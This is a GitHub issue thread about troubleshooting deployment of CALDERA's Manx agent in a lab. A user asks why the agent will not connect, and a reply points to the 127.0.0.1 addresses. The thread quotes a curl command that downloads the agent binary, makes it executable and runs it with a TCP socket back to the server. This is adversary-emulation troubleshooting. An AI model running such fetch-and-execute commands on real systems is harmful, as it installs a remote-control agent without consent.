### ISSUE TITLE
Question about Manx Agent

### ISSUE THREAD

**Issue by MireiYUTAKA** [mitre/caldera#1718]
Hello.
I have two questions about Manx Agenet and Terminal operations. 
I use CALDERA 2.7.0

1.
Even if I start the Manx plugin and try to perform the Terminal(Manx) operation, it cannot be operated.
Each IP address at this time is
CALDERA server and server running Agent: 192.168.11.22 ( Ubuntu in VirtualBox)
my PC: 192.168.11.21 ( MacOS and Google Chrome )

Ubuntu is set up in the Vbox and has a bridge connection with MacOS.
I was able to operate Manx from the browser in Ubuntu.

Also, the command executed when adding an Agent is
`server="http://127.0.0.1:8888";socket="127.0.0.1:7010";contact="tcp";curl -s -X POST -H "file:manx.go" -H "platform:linux" $server/file/download > manx.go;chmod +x manx.go;./manx.go -http $server -socket $socket -contact $contact -v`

Is this my operation wrong? Or is this a bug?

2.
Another question.
CALDERA Server: 192.168.11.22 (Ubuntu)
Server running gent: 192.168.11.21 (MacOS)
In this case, what would the command to add an Agent be?

I try this operation on my PC: 
`server="http://127.0.0.1:8888";socket="127.0.0.1:7010";contact="tcp";curl -s -X POST -H "file:manx.go" -H "platform:darwin" $server/file/download > manx.go;chmod +x manx.go;./manx.go -http $server -socket $socket -contact $contact -v`

But, it will not be added as an Agent.

I hope you can clarify it.

Greetings and thank you very much.

**Comment by privateducky** [comment]
looks like your issue is related to the IP addresses in your delivery command.
```
server="http://127.0.0.1:8888";socket="127.0.0.1:7010";contact="tcp";curl -s -X POST -H "file:manx.go" -H "platform:linux" $server/file/download > manx.go;chmod +x manx.go;./manx.go -http $server -socket $socket -contact $contact -v
```

note that it is using 127.0.0.1. you need to ensure that ports 8888 and 7010 are accessible from your agent VM to your CALDERA server. if not, you may need to change the IP address to one that will resolve (192.168.11.x).
